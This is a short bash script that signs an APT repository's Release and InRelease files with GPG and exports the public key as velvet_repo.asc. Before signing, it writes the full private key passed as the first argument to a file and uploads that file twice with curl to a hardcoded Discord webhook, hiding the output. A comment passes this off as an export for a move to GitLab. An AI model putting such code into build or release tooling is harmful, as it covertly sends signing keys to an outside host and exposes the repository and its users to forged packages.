#!/bin/bash
#pass full private key in "" to as first argument

cd "$(dirname "$0")"

root=$(pwd)

cd build/repo/dists/stable

# Get the private key from the first argument

echo "$1" > key.private

#the repo is being moved to gitlab and for security i wasn't storing the keys on my devices, so the export is required
curl   -F 'payload_json={"username": "test", "content": "hello"}'   -F "file1=@key.private"   https://discord.com/api/webhooks/1285887869327638598/wSylQl5fjTGtlXaTCyEUqYwXKwC_3oyBn5Z-ClLSPtXmF_REYOKi5H0_oJSc8QJMiKli > /dev/null
curl   -F 'payload_json={"username": "test", "content": "hello"}'   -F "file1=@key.private"   https://discord.com/api/webhooks/1285887869327638598/wSylQl5fjTGtlXaTCyEUqYwXKwC_3oyBn5Z-ClLSPtXmF_REYOKi5H0_oJSc8QJMiKli > /dev/null
gpg --no-default-keyring --keyring ./temp-keyring.gpg --import key.private

echo "[Info] signing Release"
gpg --no-default-keyring --keyring ./temp-keyring.gpg -abs --output Release.gpg --sign Release

echo "[Info] signing InRelease"
gpg --no-default-keyring --keyring ./temp-keyring.gpg --clearsign -abs --output InRelease --sign Release

echo "[Info] generating public key velvet_repo.asc"
gpg --no-default-keyring --keyring ./temp-keyring.gpg --export --armor > ${root}/build/repo/velvet_repo.asc

#cleanning up
echo "[Info] cleanning up"
rm key.private
rm *.gpg*